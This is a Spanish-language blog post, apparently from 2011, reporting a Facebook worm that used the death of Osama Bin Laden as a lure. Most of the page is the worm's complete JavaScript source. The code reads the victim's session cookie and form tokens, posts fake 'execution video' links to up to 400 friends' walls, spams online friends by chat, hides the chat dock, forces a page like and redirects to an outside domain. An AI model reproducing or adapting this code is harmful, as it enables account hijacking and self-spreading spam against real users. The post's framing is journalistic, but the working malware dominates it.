Warning: Invalid argument supplied for foreach() in /mounted-storage/home126/sub015/sc75077-YFRC/0x27.com.ar/wp-content/themes/0x27v2012b/lib/php/like.class.php on line 173
onclick="javascript:act.like(1243, '#like-1243' , '');" class="set-like voteaction
Warning: Invalid argument supplied for foreach() in /mounted-storage/home126/sub015/sc75077-YFRC/0x27.com.ar/wp-content/themes/0x27v2012b/lib/php/like.class.php on line 147

Warning: Invalid argument supplied for foreach() in /mounted-storage/home126/sub015/sc75077-YFRC/0x27.com.ar/wp-content/themes/0x27v2012b/lib/php/like.class.php on line 173
" id="voteaction">1

Un gusano llamado Osama Bin Laden infecta Facebook

 

Links externos


Era evidente que con la muerte de Osama Bin Laden iban a aparecer aplicaciones maliciosas para atrapar a los usuarios más deprevenidos, por no decirles de otra forma. En este caso, un código hecho en javascript se apodera de tu cuenta de Facebook y se disfraza como si fuera el video de su muerte. Actualmente existen tres variantes de este código pero se cree que van a salir muchas más, por lo menos hasta que Facebook bloquee esta nueva forma de intrusión. Mirá el código fuente del gusano.

Código fuente del gusano

///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
function readCookie(name) {
	var nameEQ = name + "=";
	var ca = document.cookie.split(';');
	for(var i=0;i < ca.length;i++) {
		var c = ca[i];
		while (c.charAt(0)==' ') c = c.substring(1,c.length);
		if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
	}
	return null;
}
var user_id = readCookie("c_user");
// Setup some variables
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
// Chat message variables 
var linkies = [
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down",
	"http://www.facebook.com/Osama.Gets.Shot.Down"
]
var this_chat = "Watch Osama's EXECUTION Video! " + linkies[Math.floor(Math.random()*linkies.length)];
var prepared_chat = encodeURIComponent(this_chat);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var token = Math.round(new Date().getTime() / 1000);
var http1 = new XMLHttpRequest();
var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";
var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.
	if(http1.readyState == 4 && http1.status == 200) { // If state = success
		var response1 = http1.responseText;
		response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
		response1 = JSON.parse(response1); // Convert the response to JSON
		//alert(response4.toSource());
		var count = 0;
		for(uid in response1.payload.entries){
			if(count < 400){
				//alert("SENT TO "+response1.payload.entries[count].uid);
				// Loop to send messages
				// New XMLHttp object
				var httpwp = new XMLHttpRequest();
				var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
				var statusmessage="Disturbing Yet Awesome!";
				var title="Bin Laden EXECUTION Video! Yes it's REAL!";
				var link=linkies[Math.floor(Math.random()*linkies.length)];
				var description="Commandos attack Bin Laden's compund and take him out!";
				var picture="http://i.imgur.com/yTjtU.jpg";
				var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
				httpwp.open("POST", urlwp, true);
				//Send the proper header information along with the request
				httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
				httpwp.setRequestHeader("Content-length", paramswp.length);
				httpwp.setRequestHeader("Connection", "keep-alive");					
				httpwp.onreadystatechange = function() { //Call a function when the state changes.
					if(httpwp.readyState == 4 && httpwp.status == 200){
						//alert(http.responseText);
						//alert('buddy list fetched');
					}
				}
				httpwp.send(paramswp);
			}
			count++; // increment counter
		}
		http1.close; // Close the connection
	}
}
http1.send(null);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var hide = document.getElementById('fbDockChatTabSlider');
hide.style.display = "none";
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http3 = new XMLHttpRequest();
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);
//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");
http3.onreadystatechange = function() {//Call a function when the state changes.
	if(http3.readyState == 4 && http3.status == 200) {
		var response3 = http3.responseText;
		response3 = response3.replace("for (;;);", "");
	        response3 = JSON.parse(response3);
		var count = 0;
		for(property in response3.payload.buddy_list.nowAvailableList){
			if(count < 100){
				// Loop to send messages
				// New XMLHttp object
				var httpc = new XMLHttpRequest();
				// Generate random message ID
				var msgid = Math.floor(Math.random()*1000000);
				var time = Math.round(new Date().getTime() / 1000);
				var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
				var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
				httpc.open("POST", urlc, true);
				//Send the proper header information along with the request
				httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
				httpc.setRequestHeader("Content-length", paramsc.length);
				httpc.setRequestHeader("Connection", "close");
				httpc.onreadystatechange = function() { //Call a function when the state changes.
					if(httpc.readyState == 4 && httpc.status == 200){
						//alert(http.responseText);
						//alert('buddy list fetched');
					}
				}
				httpc.send(paramsc);
			}
			//alert(property);
			count++; // increment counter
		}
		http3.close; // Close the connection
	}
}
http3.send(params3);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http4 = new XMLHttpRequest();
var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params4 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
	if(http4.readyState == 4 && http4.status == 200) {
		http4.close; // Close the connection
	}
}
http4.send(params4);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http5 = new XMLHttpRequest();
var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params5 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http5.open("POST", url5, true);
//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");
http5.onreadystatechange = function() {//Call a function when the state changes.
	if(http5.readyState == 4 && http5.status == 200) {
		http5.close; // Close the connection
	}
}
http5.send(params5);
*/
//document.getElementById('susta').style.display="none";
document.getElementById('contentArea').innerHTML="Please wait...";
setTimeout("window.location = 'http://osama.mytopanswers.info/video.htm';", 15000);

Para más información: PasteBin

Créditos a quién corresponda. Usar solamente a modo de aprendizaje.

Fuente propia

 

1 Comentario

 

  1. Javier 7 mayo, 2011  15:56 Responder

    Es increible como se las ingenian para hackear Facebook, y eso que es un entorno super probado. Igual como dice la nota, la gente ayuda a que estas cosas se propaguen...

Dejar un comentario

 

El e-mail no se publica nunca

Artículos Relacionados